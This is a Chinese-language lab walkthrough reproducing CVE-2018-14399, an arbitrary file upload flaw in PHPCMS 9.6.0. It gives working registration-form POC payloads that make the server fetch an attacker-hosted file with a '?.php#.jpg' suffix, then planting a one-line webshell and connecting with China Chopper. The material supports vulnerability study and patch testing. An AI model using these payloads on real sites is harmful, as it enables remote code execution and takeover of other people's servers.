phpcms v9.6.0任意文件上傳漏洞(CVE-2018-14399)
一、漏洞描述
PHPCMS 9.6.0版本中的libs/classes/attachment.class.php文件存在漏洞,該漏洞源於PHPCMS程序在下載遠程/本地文件時沒有對文件的類型做正確的校驗。遠程攻擊者可以利用該漏洞上傳並執行任意的PHP代碼。
二、漏洞影響版本
PHPCMS 9.6.0
三、漏洞環境搭建
1、 官方下載phpcms v9.6.0版本,下載地址: http://download.phpcms.cn/v9/9.6/
2、 解壓下載的文件,然后把文件放到phpstudy的網站根目錄下,瀏覽器訪問192.168.10.171/phpcms/install/install.php,開始安裝
3、一直點擊下一步,在”選擇模塊”這個環節,選擇”全新安裝PHPCMS V9”
4、然后一直下一步,在”賬號設置”這一塊填寫數據庫賬號和密碼以及設置管理員密碼
5、然后一直下一步,直到出現如下界面,說面成功安裝
6、登錄后台,生成首頁
四、漏洞復現
1、瀏覽器訪問前台,注冊一個會員
2、點擊注冊頁面,抓包
3、在另一個系統(kali),開啟web服務,然后在web根目錄下創建一個txt文件,寫入如下信息
4、構造POC
siteid=1&modelid=11&username=test2&password=test2123&email=test2@163.com&info[content]=<img src=http://192.168.10.153/phpinfo.txt?.php#.jpg>&dosubmit=1&protocol=
5、修改抓包內容,添加POC
6、可以看到返回包的內容包含了上傳文件的路徑
7、瀏覽器訪問
8、構造POC,上傳一句話
POC內容:
siteid=1&modelid=11&username=testa&password=testa123&email=testa@163.com&info[content]=<img src=http://192.168.10.153/test.txt?.php#.jpg>&dosubmit=1&protocol=
9、修改數據包,添加POC,需要注意: 在repeater里測試go時每一次都要修改username,password和email字段值,保證不能重復。
10、可以看到返回包的內容包含了上傳文件的路徑
11、菜刀連接
